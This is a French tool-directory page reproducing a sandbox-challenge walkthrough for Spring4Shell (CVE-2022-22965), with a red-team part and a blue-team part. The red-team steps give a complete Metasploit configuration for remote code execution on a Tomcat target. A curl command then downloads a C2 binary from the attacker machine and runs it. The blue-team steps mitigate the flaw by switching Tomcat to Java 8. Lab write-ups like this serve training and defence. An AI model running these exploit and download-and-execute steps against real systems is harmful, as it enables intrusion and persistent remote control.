Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Sandbox-Challenge-Spring4Shell-CVE-2022-22965- — Procédure pas à pas pour exploiter CVE-2022-22965 (Spring4Shell) avec Metasploit, déployer un écouteur C2, et atténuer la vulnérabilité en rétrogradant vers Java 8 sur un serveur Tomcat. | Kitploit
Outils/GitHubGitHub/felisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed TeamingLabs et Pratique
GitHubfelisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-

Sandbox-Challenge-Spring4Shell-CVE-2022-22965-

Procédure pas à pas pour exploiter CVE-2022-22965 (Spring4Shell) avec Metasploit, déployer un écouteur C2, et atténuer la vulnérabilité en rétrogradant vers Java 8 sur un serveur Tomcat.

Voir le dépôt
16il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Spring4Shell - Bac à sable de menace (CVE-2022-22965)

Aperçu

Cette procédure documente l'achèvement du Défi Bac à sable axé sur CVE-2022-22965, communément appelé Spring4Shell — une vulnérabilité critique (CVSS 9.8/10) d'exécution de code à distance affectant des versions spécifiques du framework Spring Java. Le défi couvre à la fois les perspectives offensives (équipe rouge) et défensives (équipe bleue) de la vulnérabilité.

Remarque : Les commandes et chemins de fichiers dans cette procédure reflètent l'environnement spécifique utilisé lors de cet essai. Votre environnement peut différer — ajustez les chemins, les adresses IP et les noms de fichiers en conséquence.


Environnement

MachineAdresse IPRôle
Security-Desk (Kali Linux)172.16.200.12Machine d'attaque et de travail
Red Target (Linux)172.16.100.90Cible d'exploitation
Blue Target (Linux)172.16.100.100Cible de durcissement

Identifiants : playerone / password123


Objectif de l'équipe rouge : Déployer un listener C2 sur la cible rouge

Étape 1 — Identifier la cible

Examiné l'onglet Carte réseau dans le panneau du défi pour confirmer l'IP de la cible rouge (172.16.100.90). Utilisé curl pour inspecter l'application web fonctionnant sur le port 80 :

root@kitploit:~
curl http://172.16.100.90

La sortie a révélé Apache Tomcat 9.0.59 avec une redirection vers /dasmsp. Consulté le code source de la page pour identifier un point de terminaison de formulaire POST à /dasmsp/contact.

Étape 2 — Lancer Metasploit et configurer l'exploit

root@kitploit:~
msfconsole
root@kitploit:~
use exploit/multi/http/spring_framework_rce_spring4shell
set RHOSTS 172.16.100.90
set LHOST 172.16.200.12
set RPORT 80
set TARGETURI /dasmsp/contact
set PAYLOAD_PATH webapps/ROOT
set HTTP_METHOD POST
set ForceExploit true
run

L'exploit a généré avec succès un shell JSP, modifié le chargeur de classes, vidé le fichier journal et ouvert une session de shell de commande sur la cible rouge.

Étape 3 — Obtenir un shell interactif

Après l'ouverture de la session, saisi shell pour passer à un shell interactif. Metasploit a localisé /usr/bin/script sur la cible et l'a utilisé pour ouvrir un shell interactif en tant qu'utilisateur tomcat.

Étape 4 — Transférer et exécuter deploy_c2

Le binaire deploy_c2 se trouvait sur Security-Desk, pas sur la cible rouge. Hébergé via un serveur HTTP Python3 sur Security-Desk :

root@kitploit:~
cd /home/playerone/Desktop/Resources/
python3 -m http.server 8080

Téléchargé et exécuté depuis la session shell de la cible rouge :

root@kitploit:~
curl http://172.16.200.12:8080/deploy_c2 -o /tmp/deploy_c2
chmod +x /tmp/deploy_c2
/tmp/deploy_c2

La sortie a confirmé : Done! — Le listener C2 a été déployé avec succès sur la cible rouge.


Objectif de l'équipe bleue : Atténuer CVE-2022-22965 sur la cible bleue (rétrograder vers Java 8)

Étape 1 — SSH vers la cible bleue

Depuis le terminal de Security-Desk :

root@kitploit:~
ssh [email protected]

Mot de passe : password123

Étape 2 — Transférer les paquets Java 8 vers la cible bleue

Les paquets .deb de Java 8 se trouvaient sur Security-Desk dans /home/playerone/Desktop/Resources/. Transférés vers la cible bleue en utilisant SCP depuis un terminal de Security-Desk :

root@kitploit:~
scp /home/playerone/Desktop/Resources/*.deb [email protected]:/tmp/

Paquets transférés :

  • adoptium-ca-certificates_1.0.2-1_all.deb
  • fonts-dejavu_2.37-6_all.deb
  • p11-kit-modules_0.24.1-2_amd64.deb
  • p11-kit_0.24.1-2_amd64.deb
  • temurin-8-jdk_8.0.402.0.0+6_amd64.deb

Étape 3 — Installer les paquets Java 8

Sur la session SSH de la cible bleue :

root@kitploit:~
sudo dpkg -i /tmp/*.deb

Étape 4 — Définir Java 8 comme par défaut (solution de contournement pour un problème connu)

En raison d'un problème connu du défi, la vérification ne s'enregistre pas correctement sans définir manuellement Java 8 comme par défaut :

root@kitploit:~
sudo update-alternatives --config java

Sélectionné l'option 2 — /usr/lib/jvm/temurin-8-jdk-amd64/bin/java.

Étape 5 — Mettre à jour le service Tomcat pour utiliser Java 8

Inspecté le fichier d'unité de service Tomcat :

root@kitploit:~
cat /etc/systemd/system/tomcat.service

Modifié le fichier pour mettre à jour la variable d'environnement JAVA_HOME :

root@kitploit:~
sudo nano /etc/systemd/system/tomcat.service

Changé :

root@kitploit:~
Environment="JAVA_HOME=/usr"

En :

root@kitploit:~
Environment="JAVA_HOME=/usr/lib/jvm/temurin-8-jdk-amd64"

Étape 6 — Recharger et redémarrer Tomcat

root@kitploit:~
sudo systemctl daemon-reload
sudo systemctl restart tomcat

La vérification 'CVE-2022-22965 atténué sur la cible bleue' est devenue verte dans le panneau du défi.


Outils utilisés

  • Metasploit Framework (spring_framework_rce_spring4shell module)
  • curl
  • Python3 HTTP Server
  • SSH / SCP
  • dpkg
  • systemctl
  • update-alternatives
  • nano
Télécharger l’outil